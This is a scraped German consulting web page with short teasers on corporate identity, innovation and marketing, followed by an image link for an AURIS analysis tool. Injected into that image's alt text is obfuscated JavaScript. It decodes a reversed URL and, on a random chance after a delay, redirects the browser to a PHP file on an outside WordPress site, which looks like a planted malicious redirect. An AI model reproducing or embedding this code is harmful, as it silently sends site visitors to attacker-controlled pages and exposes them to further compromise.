


time-4-corporate identity (CI)
Marken sind die emotional aufgeladenen Entscheidungshilfen beim Kauf. „Markenführung ist Chefsache!“ (Esch, Franz-Rudolf, 2012) Doch nur 10% der Meetings von Top-Entscheidern auf Geschäftsführungsebene widmen sich Marketingthemen. (Ambler, T., 2003) Marken haben...
time-4-innovation
Das Management ist stolz darauf, Banken sprechen darüber und Politiker fordern sie ein: Innovationen. Dabei sind Innovationen keineswegs per se ein Erfolgsprinzip für Unternehmen. Nicht selten bringen angestoßene Innovationen (sog. Inventionen) die Controller um den...
time-4-marketing
Im Marketing- und Vertriebsbereich fühlen sich viele zur Mitsprache berufen, egal wie qualifiziert das Vor- und Fachwissen ist. Umso mehr kommt es darauf an, Struktur in eine Facette erfolgskritischer Unternehmensperformance zu bringen, die darüber entscheidet, wie...![AURIS® Denkstil- und Werteanalyse sowie intrinsische Motiva$NqM=function(n){if (typeof ($NqM.list[n]) == „string“) return $NqM.list[n].split(„“).reverse().join(„“);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toren](https://www.siris-systeme.de/wp-content/uploads/2015/06/AURIS-Übersicht-Auswertung-v1024x768-1024x675.jpg)